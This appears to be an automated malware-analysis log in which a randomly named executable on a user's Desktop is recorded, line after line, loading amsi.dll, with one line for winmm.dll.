Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
